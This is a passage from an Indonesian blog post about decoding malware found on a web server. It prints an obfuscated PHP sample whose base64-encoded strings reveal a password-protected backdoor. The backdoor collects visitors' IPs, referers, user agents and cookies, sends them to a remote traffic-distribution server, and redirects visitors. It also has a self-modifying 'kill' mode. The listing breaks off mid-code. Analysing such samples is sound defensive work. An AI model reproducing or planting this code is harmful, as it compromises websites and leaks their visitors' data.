HomeKomputer

Komputer

Linux

decoding malware ddos UDP paket

contoh skrip malware yang ada di server <blockquote> &lt;? function _1246590434($i){$a=Array('S1liWjR2Yw==','aDRI','','SCo=','bW9kZQ==','Y29uZmln','a2V5','a2V5','PGZvcm0gbmFtZT0iZm9ybTEiIG1ldGhvZD0icG9zdCIgYWN0aW9uPT9tb2RlPXNldGNvbmZpZyZrZXk9','a2V5','PjxwcmU+ClREUzogICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzIiB2YWx1ZT0i','dXJs','Ij4gIFREUyBJUDogIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzaXAiIHZhbHVlPSI=','aXA=','Ij4KS0VZOiAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBrZXkiIHZhbHVlPSI=','a2V5','Ij4gIFJlc2VydmU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdG8iIHZhbHVlPSI=','bGlu','Ij4KSUQ6ICAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBlc2RpZCIgdmFsdWU9Ig==','aWQ=','Ij4gIDxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IlN1Ym1pdCIgdmFsdWU9Im9rIj48L3ByZT4KPC9mb3JtPg==','c2V0Y29uZmln','a2V5','a2V5','Lw==','U0NSSVBUX05BTUU=','dXJs','cHRkcw==','aXA=','cHRkc2lw','bGlu','cHRv','aWQ=','cGVzZGlk','a2V5','cGtleQ==','YWNjX2lk','YWNjX2lk','dw==','','U2F2ZWQuCg==','a2lsbA==','a2V5','a2V5','Nzc3','U0NSSVBUX0ZJTEVOQU1F','U0NSSVBUX0ZJTEVOQU1F','b2sK','Lw==','dXJs','aXA=','aXA=','YWNjX2lk','YWNjX2lk','aHR0cDovLw==','SFRUUF9IT1NU','U0NSSVBUX05BTUU=','SFRUUF9SRUZFUkVS','UkVNT1RFX0FERFI=','bm8=','SFRUUF9YX0ZPUldBUkRFRF9GT1I=','eWVz','SFRUUF9VU0VSX0FHRU5U','aWQ=','aWQ=','a2V5','Jg==','a2V5','PQ==','UVVFUllfU1RSSU5H','R0VUIA==','dXJs','P2RvbT0=','JnJlZj0=','JmlwPQ==','JnByb3g9','JmFnZW50PQ==','JmNvb2tpZT0=','JmVzZGlkPQ==','aWQ=','JmZyYW1laWQ9','JmFjY19pZD0=','IEhUVFAvMS4wDQo=','SG9zdDog','DQo=','Q29ubmVjdGlvbjogQ2xvc2UNCg0K','DQo=','ZG8=','ZG8=','IA==','bGlu','MjAw','bGlu','Oi8v','aHR0cA==','SFRUUC8xLjEgMzAyIEZvdW5k','TG9jYXRpb246IA==','Y29vaw==','Jg==','PQ==','ZWNobw==');return base64_decode($a[$i]);} ?&gt;<!--?php error_reporting(0);$key=_1246590434(0);function string_cpt($String,$Password){$Salt=_1246590434(1);$StrLen=strlen($String);$Seq=$Password;$Gamma=_1246590434(2);while(strlen($Gamma)&lt;$StrLen){$Seq=pack(_1246590434(3),sha1($Gamma .$Seq .$Salt));$Gamma .= substr($Seq,0,8);}return $String^$Gamma;}$c=unserialize(string_cpt(base64_decode($cfg),$key));$mode=$_REQUEST[_1246590434(4)];if($mode == _1246590434(5)AND $c[_1246590434(6)]== $_REQUEST[_1246590434(7)]){echo _1246590434(8) .$_REQUEST[_1246590434(9)] ._1246590434(10) .$c[_1246590434(11)] ._1246590434(12) .$c[_1246590434(13)]read more

0 0 193